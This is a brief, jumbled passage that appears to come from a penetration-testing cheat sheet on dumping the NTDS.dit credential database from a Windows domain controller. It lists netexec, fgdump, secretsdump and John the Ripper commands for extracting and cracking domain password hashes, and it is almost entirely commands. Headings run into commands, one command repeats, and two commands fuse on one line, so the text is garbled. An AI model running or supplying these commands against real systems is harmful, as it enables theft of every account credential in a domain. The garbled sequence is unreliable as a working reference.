Dumping NTDS.dit
netexec
# dump ntds on domain controller
nxc smb $dc_ip -u $admin_user -p $pass --ntdsFGDump
secretsdump
Cracking the hashes
Last updated
# dump ntds on domain controller
nxc smb $dc_ip -u $admin_user -p $pass --ntdsLast updated
.\fgdump.exe# when you have the ntds.dit
./secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCALjohn --format=NT hash --show